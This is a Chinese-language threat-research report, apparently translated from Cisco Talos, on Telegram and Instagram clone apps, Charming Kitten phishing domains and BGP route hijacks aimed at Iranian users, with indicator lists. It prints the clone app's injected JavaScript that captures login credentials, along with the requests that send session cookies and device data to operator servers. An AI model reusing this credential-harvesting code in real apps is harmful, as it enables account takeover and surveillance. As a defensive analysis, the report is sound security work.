Persian Stalker攻擊Instagram和Telegram的伊朗用戶

一、簡介

那些具有國家背景的攻擊者擁有許多不同的技術可以遠程訪問社交媒體和安全消息應用程序。從2017年開始到2018年，思科Talos已經觀察到多種不同的技術被用來攻擊用戶並竊取私人信息。這些技術包括使用假登錄頁面、偽裝成合法對手的惡意應用程序和BGP劫持，專門針對安全消息應用程序Telegram和社交媒體Instagram的伊朗用戶。

Telegram在伊朗已經成為灰色軟體的熱門目標，該應用程序估計有4000萬用戶。雖然它主要用於日常交流，但抗議組織過去也曾用它來組織針對伊朗政府的示威活動，特別是在2017年12月。在少數情況下，伊朗政府要求Telegram關閉某些「促進暴力」的頻道。自2017年以來，本文中概述的策略一直在使用，旨在收集有關Telegram和Instagram用戶的信息。這些活動的複雜性、資源需求和方法各不相同。下面，我們概述網路攻擊、應用程序克隆和經典網路釣魚的示例。我們相信，這些活動被用於專門針對Telegram應用程序的伊朗用戶，以竊取個人和登錄信息。

安裝後，即使用戶在使用合法的Telegram應用程序，其中一些Telegram「克隆」也可以訪問移動設備的完整聯繫人列表和消息。在安裝虛假的Instagram應用程序的情況下，惡意軟體將完整的會話數據發送回後端伺服器，這允許攻擊者完全控制正在使用的帳戶。我們高度自信的將這些應用程序應歸類為「灰色軟體」。它不具有惡意目的，不能被歸類為惡意軟體，但可疑性足以被視為潛在有害程序（PUP）。這種軟體很難檢測，因為它通常滿足用戶期望的功能（例如發送消息）。這種軟體唯一能夠被安全研究人員檢測到，如果它在其他地方產生惡劣影響。Talos最終發現了幾款可能用於影響深遠的攻擊行動的軟體。我們相信此灰色軟體有可能降低使用這些應用程序的移動用戶的隱私和安全性。我們的研究表明，其中一些應用程序將數據發送回主機伺服器，或者被位於伊朗的IP地址以某種方式進行控制，即使這些設備位於國外也是如此。

我們在伊朗攻擊中看到的另一種方法是創建虛假登錄頁面。儘管這不是一種先進的技術，但對於那些不了解網路安全的用戶來說，它是有效的。像「Charming Kitten」這樣的伊朗組織一直在使用這種技術，目標是安全消息應用程序。一些攻擊者也在劫持設備的BGP協議。該技術重定向所有路由器的流量，而不考慮這些新路由的原始路由。為了劫持BGP，需要與互聯網服務提供商（ISP）進行某種合作，並且很容易檢測到，因此新的路由將不會在很長時間到位。

Talos沒有在觀察到的幾次攻擊之間找到一個牢固的聯繫，但所有這些攻擊都針對伊朗及其國民和Telegram應用程序。雖然這篇文章的重點是伊朗，但全球的移動用戶仍然需要意識到，這些技術可以被任何國家的威脅行為者使用，無論國家贊助與否。這在伊朗和俄羅斯等國家尤為普遍，在這些國家，Telegram等應用程序被禁止。開發人員創建的克隆版本出現在官方和非官方應用程序商店，克隆Telegram的服務。

普通用戶無法對BGP劫持做任何事情，但使用官方應用程序商店中的合法應用程序可降低風險。同樣的規則適用於克隆的應用程序，從不受信任的來源安裝應用程序意味著用戶必須意識到面臨一定程度的風險。在這兩種情況下，當應用程序是非官方的「增強功能」應用程序時，即使它們在官方Google Play商店中可用，這種風險也會大大增加。

二、策略

（一） 功能增強型應用程序（灰色軟體）

1. andromedaa.ir

Talos確定了一家完全專註於伊朗市場的軟體開發商。開發商在iOS和Android平台上都使用「andromedaa.ir」這個名稱。它開發的軟體旨在增加用戶在Instagram等社交媒體網路上的曝光率，以及某些Telegram頻道上的伊朗用戶數量。

在查看網站，更具體地說是安裝鏈接時，顯然這些應用程序都沒有在官方應用程序商店（谷歌或蘋果）中發布，這可能是由於美國政府對伊朗實施的制裁。

Whois查詢andromedaa.ir

Talos在分析與域名andromedaa [.] com相關的whois信息後識別出多個域名，除了一個之外都使用相同的電話號碼註冊。

發現的部分域名列表

我們掃描了與上述域名相關的IP地址，所有IP均使用了SSL證書模式。

證書信息

分析此SSL證書發現了另一個域名——flbgr [.] com ，其whois信息受隱私保護。根據SSL證書中這些值的低流行度，Talos將此域名與高可信度的同一威脅行為者相關聯。域名flbgr [.] com於2018年8月6日註冊，是最近註冊的域名，IP地址解析為145.239.65 [.] 25。 Cisco Farsight數據顯示其他域名也解析為相同的IP地址。

解析為相同ip地址的域名

之後，Talos發現了一個SSL證書，CN為followerbegir [.] ir，其中包含sha256指紋。我們還發現了另一個與之非常類似的證書。然而，似乎有兩個拼寫錯誤：一個在CN欄位「followbeg.ir」中，另一個在OU欄位中，它被標識為「andromeda」，而不是andromedaa。

證書信息

2.劍橋環球學院有限公司

Andromedaa.ir發布了iOS應用程序，但它是使用劍橋環球學院有限公司簽發的開發者證書籤署的。這是一家英國和威爾士註冊的公司，提供iOS開發服務。該公司由一名伊朗公民擁有，他還至少擁有4家其他公司，分布在四個不同的國家：英國、美國、土耳其和愛沙尼亞。所有這些公司都共享相同的服務，提供類似內容的網頁。

3.商業模型

所有屬於andromedaa.ir的應用程序都通過在特定Telegram頻道中增加喜歡、評論、關注者甚至用戶數量來增加用戶在Instagram或Telegram上的曝光率。所有這些都保證了只有伊朗用戶才能執行此類行動。同樣的運營商也管理（見上一節）像lik3.org這樣的網站，它們銷售同樣的曝光服務。

價目表

雖然這些服務並未違法，但它們肯定是「灰色」服務。在同一網站上，我們可以看到營銷策略強調使用此服務而非其他服務的好處。

Lik3.org營銷（google.com翻譯）

值得注意的是，運營商表示他們永遠不會要求Instagram客戶提供密碼，並且所有網站的用戶都是真實的。實際情況是，運營商不需要Instagram的客戶密碼，因為Instagram用戶不需要登錄該用戶的帳戶來「喜歡」他們的帖子。

相反，運營商可以訪問數千個用戶會話。他們可以訪問已安裝「免費」應用程序的所有用戶，這意味著他們可以在這些會話期間做任何想做的事情。雖然操作人員對Telegram應用程序使用了另一種不同的方法，但這些方法也可能導致完整的會話被接管。有關詳細信息，請參閱「應用程序示例」部分。

此處的危險並不是該運營商可以賺錢，而是用戶的隱私存在風險。應用於控制Instagram和Telegram帳戶的相同方法使操作人員可以訪問用戶的完整聯繫人列表，Telegram上的未來消息以及Instagram用戶的完整個人資料。伊朗禁止使用這些網站，特別是Telegram，因為它加密聊天信息，阻止政府訪問。通過使用這些方法，運營商可以危及終端用戶並訪問所有未來的聊天。

雖然大部分後端都託管在歐洲，但所有經過測試的應用程序都會向位於伊朗的伺服器執行更新檢查。同樣，這本身並不是惡意的，但考慮到禁用應用程序的背景，這可能導致政府可以訪問數千個移動設備。但是，Talos未發現此運營商與任何政府、伊朗或其他方面建立直接關係。

（二）應用程序示例

1.Follower Begir Instagram iOS 應用

我們分析的第一個應用程序是為iOS設計的????????????????? ?????? ???? ????????（"Follower Begir Instagram"）。Andromedaa.ir發布了這個應用，並由劍橋環球學院簽署。此應用程序是Instagram的克隆版。

登錄後的屏幕

開發人員添加了一些功能，如虛擬貨幣和波斯語支持等。

證書信息

該應用程序使用iOS WebKit框架來顯示Web內容，在本例中即為Instagram頁面。首次執行時，應用程序顯示使用注入以下JavaScript代碼段的Instagram登錄頁面。

document.addEventListener("click", function() {

try {

var tu = document.querySelector("[name="username"]");

var tp = document.querySelector("[name="password"]");

var tpV = (typeof tp == "undefined") ? "" : tp.value;

var tuV = (typeof tu == "undefined") ? "" : tu.value;

} catch (err) {

var tuV = "";

var tpV = "" }

var bd = document.getElementsByTagName("body")[0].innerText;

var messageToPost = {

"pu": tuV,

"pp": tpV,

"bd": bd

}; window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);}, false);

此代碼的目的是在用戶單擊「連接」按鈕時將控制提供給iOS應用程序。應用程序接收事件、用戶名和密碼欄位的值以及頁面正文。該事件由followerbegir.AuthorizationUserController userController：didReceiveScriptMessage()函數處理。之後，應用程序在Instagram伺服器上進行身份驗證。

在調查期間，我們發現密碼並未直接發送到後端伺服器（v1[.]flbgr[.]com）。下面是發送到ping.php網頁的數據：

POST /users/ping.php?m=ios&access=[redacted]&apk=35&imei=[redacted]&user_details=[redacted]&tokenNumber=[redacted] HTTP/1.1

Host: v1.flbgr.com

SESSIONID: [redacted]

HEADER: vf1IOS: 3361ba9ec3480bcd3766e07cf6b4068a

Connection: close

Accept: */*

Accept-Language: fr-fr

User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0

Accept-Encoding: gzip, deflate

Content-Length: 0

如果帳戶是私人的，則後端伺服器的運營商接收移動類型（iOS）、令牌和用戶數據，比如用戶名、個人資料圖片和全名。

SESSIONID變數包含最敏感的信息：具有有效cookie的Instagram連接的header。伺服器的所有者可以使用此欄位中可用的信息劫持用戶的Instagram會話。

該應用程序的更新機制基於伊朗，這與大多數基礎設施不同。當應用程序啟動時，它發送一個請求到ndrm [.] ir：

POST /start/fl.php?apk=35&m=ios HTTP/1.1

Host: ndrm.ir

HEADER: vf1

Connection: close

IOS: 3361ba9ec3480bcd3766e07cf6b4068a

Accept: */*

User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0

Accept-Language: en-gb

Accept-Encoding: gzip, deflate

Content-Length: 0

如果不是最新版本，則應用程序會將用戶重定向到andromedaa商店：

信任開發人員證書的說明

該商店包含新版本的應用程序和一個信任前面提到的開發人員證書的過程。這就允許開發人員在任何時間點更新證書信任和應用程序。

2.Ozvbegir(ozvdarozv)

Ozvbegir應用程序的目的是增加用戶Telegram頻道的成員數量。該程序保證這些用戶只會是伊朗用戶。

應用程序描述

我們分析了Android版本的應用程序。程序包由自簽名證書籤署，證書有效期至3014年。

最近的Ozvbegir證書

同一應用程序的早期版本也使用自簽名證書，但發行者和主題信息都顯然是錯誤的。

早期版本的證書

和之前的應用程序一樣，Ozvbegir被重新打包，並包含來自Telegram的原始類。

Ozvbegir 類結構

事實上，我們在程序包清單中發現的標誌實際上是最初的Telegram的標誌，該標誌被更改以適應應用程序代碼。清單上使用的名稱和標籤有幾個對Telegram原始應用程序的引用，甚至用於Android Maps應用程序的API密鑰也保持不變。

更新檢查和響應

和之前的應用程序一樣，這個應用程序也通過向ndrm.ir域名發送HTTP請求來檢查新版本。如果應用程序不是最新版本，它將同時收到消息和獲取最新版本的鏈接，該版本可以是操作人員想要的任何內容。在此情況下，它來自cafebazaar.ir，一個伊朗的Android應用程序商店。

域名ndrm.ir註冊在與所有其他應用程序支持域名相同的電子郵件之下。然而，這是唯一一個實際託管在伊朗的應用程序，同時也是能夠在移動設備上升級的應用程序。應用程序的外觀和感覺上非常類似於原始的Telegram。就像最初的Telegram一樣，在第一次打開應用程序時用戶被要求提供電話號碼以便在Telegram中註冊。

電話號碼請求

該註冊為同一設備創建一個影子會話，使應用程序可以訪問完整的聯繫人列表和將來的消息。

在手機上創建的會話

在註冊過程結束時，應用程序聯繫後端伺服器，提供有關用戶和移動設備的信息。

GET /users/ping.php?access_hash=[redacted]&inactive=0&flags=1107&last_name=%21%21empty%21%21&phone=[redacted]&tg_id=[redacted]&m=d&user_name=[redacted]&first_name=Pr2&network=SYMA&country=[redacted]&apk=570&imei=[redacted]&brand=motorola&api=24&version=7.0&model=Moto+G+%285%29&tut=[redacted] HTTP/1.1

TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1

NUM: df27340104277f1e73142224d9cb59e8

HEADER: bt6

ADMIN: web

Host: v1.ozvdarozv.com

Connection: close

User-Agent: Apache-HttpClient/4.5.1 (java 1.4)

我們在Telegram頻道上確認用戶數量超過100萬，這些用戶在首次打開應用程序時自動加入。

頻道信息

3.Bitgram_dev

與之前的開發人員不同，Bitgram_dev在互聯網上沒有大量的蹤跡。目前，它在Google Play上有兩個已發布的應用程序--AseGram和BitGram。這些應用從9月初到10月初開始提供，下載了近10,000次。

谷歌商店裡的AseGram 和BitGram

發布者信息

鑒於AseGram和BitGram的目的在於規避伊朗對Telegram的禁令，由此認為發布者希望在自我保護措施方面佔據一席之地是合理的。

4.AseGram

AseGram應用程序適用於某些國家/地區的Google Play商店。即使該應用程序是從Google Play商店下載的，簽署該軟體包的證書在安全方面也是完全無用的。

AseGram證書

該Telegram克隆創建的目的就是為了攔截來自用戶的所有通信。但是，這個方法採用與其他不同的方法：該軟體使用Telegram包層定義的代理來攔截流量。

設置代理的代碼

同之前的應用程序一樣，AseGram重新打包了合法Telegram的Android版。這就避免了開發人員在嘗試實現自己的Telegram客戶端時可能遇到的所有問題。

服務org.pouyadr.Service.MyService在手機啟動時啟動，它調用原始Telegram包中的MessagesController.getGlobalMainSettings()，並更改設置以包含代理配置。

配置詳細信息被硬編碼到惡意軟體中，並使用AES加密，密鑰源自與特軟體包中特定值相關聯的硬編碼值。

該應用程序涉及三個域名：talagram.ir，hotgram.ir和harsobh.com，所有這些域名都註冊在伊朗公司名下。在此情形下，應用程序管理員可以訪問通信。

此應用程序創建的服務只能通過關閉應用程序來禁用，並在設備啟動時啟動。該服務包含安裝新軟體包所需的代碼，由系統中的標準軟體包管理器處理。該服務還負責聯繫位於伊朗的IP地址。實際上，這個使用Telegram克隆的後端稱為「Advanced Telegram」或（Golden Telegram）。該應用程序可在cafebazaa.ir上獲得，這是一家伊朗批准的Android應用程序商店。

高級Telegram cafebazaar頁面

需要著重強調的是本頁面的第一句 "??? ?????? ?? ?????? ?????? ???? ?????? ?????" ("This program operates within the framework of the laws of the country"，本計劃在該國法律的框架內運作）。很難找到一個合法的用例，其中規避禁令的應用程序應該聯繫由應用禁令的同一國家審查的克隆應用程序使用的相同伺服器，使這些通信高度可疑。

該應用程序還包含使用位於多個國家/地區的socks伺服器的代碼，可用於規避禁令。然而，在研究中，我們從未見過這些被使用過。另一方面，如果物理設備不在伊朗，我們已經看到流量發送到位於該國的伺服器，這與試伊朗禁用Telegram 並不兼容。

二、策略

（三）虛假網站

1.假冒的TELEGRAM 網站

獲取用戶Telegram帳戶訪問許可權的最簡單方法是對用戶進行社交工程，誘導其將用戶名和密碼輸入由攻擊者控制的欺詐性網站。我們在野外觀察到域名youtubee-videos [.] com，它模仿了Telegram的Web登錄頁面。

假Telegram登陸頁面

此域名已於2017年7月25日註冊。基於戰略、技術和程序（TTP），例如域名註冊模式，電子郵件地址nami.rosoki@gmail [.] com——用於註冊此域名以及其他域名，其被動域名伺服器（pDNS）記錄表明該域名與Charming Kitten組織相關聯。這個相同的域名獨立地將Charming Kitten與另一家網路安全公司Clearsky聯繫在一起。在進一步檢查網頁源代碼後，發現該網站是使用名為Webogram的GitHub項目構建的，源頁面中的字元串顯示該網站是為iPhone設計的。

引用GitHub.com上的源代碼

2.新確認的屬於CHARMING KITTEN的域名

雖然Talos正在研究Charming Kitten攻擊者使用的欺騙性Telegram網站，但我們也發現了許多其他惡意域名，其中包含「移動」，「信使」等關鍵字，在某些情況下還包含「hangouts」，這可能是一個參考名為Hangouts的Google聊天應用程序。這表明這些攻擊者對獲取終端用戶的移動設備一直孜孜不倦，特別是聊天消息。這些域名也使用了2017年與該組織相關的其他域名相同的Modus operandi進行註冊。通過分析pDNS記錄， Talos發現了解析為相同IP地址的其他域名。

這清楚地表明，該組織正在進行一項攻擊活動，重點關注用戶憑據和消息傳遞應用程序。

（四）BGP 路由異常

1.背景

在監控BGPStream，思科的邊界網關協議（BGP）公告資料庫，Talos注意到一些源自伊朗ASN 58224的路由異常。對於那些不熟悉此協議的人，BGP在RFC中定義4271，作為「一種自治系統路由協議」。在此上下文中，「路由被定義為將一組目標與這些目標的路徑屬性配對的信息單元。」簡而言之，該協議允許在請求位於所請求的網路或自治系統之外的資源時發生互聯網通信。

在互聯網上使用BGP來協助選擇最佳路徑路由。重要的是要注意，這可以在ISP級別進行操作，具體取決於各種因素，BGP允許路由選擇。 BGP通過語音系統優化互聯網流量的路由，RFC 4271將其定義為：

BGP語音系統的主要功能是與其他BGP系統交換網路可達性信息。該網路可達性信息包括關於可達性信息遍歷的自治系統（AS）列表的信息。

這些語音系統充當路由器向鄰近系統發送「更新消息」的平台。 「更改路由屬性的過程是通過通告替換路由來完成的。替換路由攜帶新的[已更改]屬性，並且具有與原始路由相同的地址前綴。」

雖然這是為了解決網路問題而設計的，但沒有添加足夠的安全機制來防止它被濫用。除了某些方法（如鄰居的MD5密碼，IPSec或GTSM）之外，BGP不提供安全機制。這些都不是默認要求，因此不一定被廣泛使用。這可以允許某人發送具有到相同前綴或AS的備用路由的更新消息，即使主路由沒有問題。

這可能導致一些流量通過受害者的預定或次優路線。這些路由偏差有時被稱為BGP劫持會話。 BGP劫持會話的有效性是根據通過消息接收更新的BGP對等方的數量來衡量的。接收更新消息的對等體越多，通過備選次優路徑路由的流量就越可能由行為者預先配置。

2.來自ASN 58224的預先計劃的路由活動

一個有趣的BGP路由異常發生在2018年6月30日07:41:28 UTC。在此次活動中，總部位於伊朗的ASN 58224宣布更新前綴185.112.156.0/22。伊朗電信提供商伊朗電信公司PJS擁有發送更新消息的ASN。

這個可能被劫持的範圍與匈牙利的互聯網服務提供商（ISP）DoclerWeb Kft有關。9個BGPmon對等體檢測到此事件，持續了2小時15分鐘，直到傳播新的更新消息。雖然此事件的規模非常小，但這可能是針對更大的BGP劫持嘗試的試運行。

有更多重要的BGP異常來自同一個伊朗的ASN 58224。在2018年7月30日UTC時間06:28:25，四條BGP路線在同一時間被宣布為「more specific」，直到第二，影響與Telegram的溝通。當路由器通過語音系統收到此更新消息時，他們開始通過ASN 58224路由一些發往Telegram伺服器的流量。此活動證明特別有效，因為大量的BGPmon對等端觀察到它，表明它在整個區域中通過語言系統傳播。如同一個月前一樣，所有路由器都在2小時15分鐘後收到更正的更新消息，結束了劫持。

3 .BGP劫持如何能夠操縱計算機網路

從理論上講，這可能是破壞與Telegram伺服器通信的攻擊的組成部分。這次劫持會話導致一些Telegram消息被發送給伊朗電信提供商。其他有國家背景的攻擊者也使用此技術來傳遞惡意軟體，正如其他安全研究人員在2018年5月所記錄的那樣。一旦流量通過所需的ISP路由，就可以對其進行修改和檢查。一些開源報告表明，伊朗電信提供商此前曾與伊朗政府合作獲取通信。該文章建議電信公司向政府提供訪問Telegram賬戶所需的簡訊驗證碼。

這種特殊的能力很有吸引力，因為它可以讓攻擊者通過伊朗在相鄰的ASN中路由流量。這可能使威脅行為者能夠訪問附近國家的設備，並損害使用非伊朗電信提供商的用戶。

伊朗信息和通信技術部長Mohammad-Javad Azari Jahromi承認了這一事件並表示將對此進行調查。伊朗政府沒有就此調查公開發布任何進一步的信息。

三、總結

我們在這裡討論的三種技術並不是具有國家背景的攻擊者用來部署針對其公民的監視機制的全部技術。大規模互聯網防火牆和監視部署一直出現在新聞中。其中一些活動還針對特定應用，例如Telegram。然而，這些顯然不相關的事件至少有兩個共同點：伊朗和Telegram。這些共性相距甚遠，因為伊朗已經禁止了該國的Telegram。但是我們發現有幾個Telegram克隆擁有數千次安裝，它們以某種方式聯繫了位於伊朗的IP地址，其中一些廣告宣傳他們可以規避禁令。這些應用程序的活動並非違法，但它使操作人員可以完全控制消息傳遞應用程序，並在某種程度上控制用戶的設備。

即使在使用經典網路釣魚技術的情況下，像Charming Kitten這些組織的長期活動仍然對那些不太了解網路安全的用戶有效。鑒於所有這些活動的共同點是公民身份，可以理解的是，絕大多數人都不會像網路安全專業人士一樣接受網路安全教育，因此即便是這種經典技術也可能非常有效。

雖然Talos不可能準確地確定7月30日路由更新消息背後的意圖，但Talos有信心地評估這些更新是針對該地區基於Telegram的服務的蓄意行為。四個更新消息不可能在同一時間分發，通過與一個ASN 58224相關的四個不同子網路由兩個不同的Telegram。

除了受害者和應用程序之外，Talos無法在每個事件之間找到任何可靠的聯繫。這項調查的重點是伊朗，是因為目前伊朗禁用Telegram。但是，這些技術可以被任何惡意行為者使用，無論是否有國家贊助。Talos確信使用本文中討論的應用程序時用戶的隱私存在風險。所以應該認真對待整體安全問題。

IOC

域名

·talagram[.]ir

·hotgram[.]ir

·Harsobh[.]com

·ndrm[.]ir

·andromedaa[.]ir

·buycomment[.]ir

·bazdiddarbazdid[.]com

·youpo[.]st

·im9[.]ir

·followerbegir[.]ir

·buylike[.]ir

·buyfollower[.]ir

·andromedaa[.]ir

·30dn[.]ir

·ndrm[.]ir

·followerbeg[.]ir

·viewmember[.]ir

·ozvdarozv[.]ir

·ozvbegir[.]ir

·obgr[.]ir

·likebeg[.]ir

·lbgr[.]ir

·followgir[.]ir

·followbegir[.]ir

·fbgr[.]ir

·commentbegir[.]ir

·cbgr[.]ir

·likebegir[.]com

·commentbegir[.]com

·andromedaa[.]com

·ozvbegir[.]com

·ozvdarozv[.]com

·andromedaa[.]net

·lik3[.]org

·homayoon[.]info

·buylike[.]in

·lkbgr[.]com

·flbgr[.]com

·andromedaa[.]com

·mobilecontinue[.]network

·mobilecontinue[.]network

·mobile-messengerplus[.]network

·confirm-identification[.]name

·invitation-to-messenger[.]space

·com-messengersaccount[.]name

·broadcastnews[.]pro

·youridentityactivity[.]world

·confirm-verification-process[.]systems

·sessions-identifier-memberemailid[.]network

·mail-profile[.]com

·download-drive-share[.]ga

·hangouts-talk[.]ga

·mail-login-profile[.]com

·watch-youtube[.]live

·stratup-monitor[.]com

·Xn--oogle-v1a[.]ga (?oogle[.]ga)

·file-share[.]ga

Hash

·8ecf5161af04d2bf14020500997afa4473f6a137e8f45a99e323fb2157f1c984 - BitGram

·24a545778b72132713bd7e0302a650ca9cc69262aa5b9e926633a0e1fc555e98 - AseGram

·a2cf315d4d6c6794b680cb0e61afc5d0afb2c8f6b428ba8be560ab91e2e22c0d followerbegir.ipa

·a7609b6316b325cc8f98b186d46366e6eefaae101ee6ff660ecc6b9e90146a86 ozvdarozv.apk

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！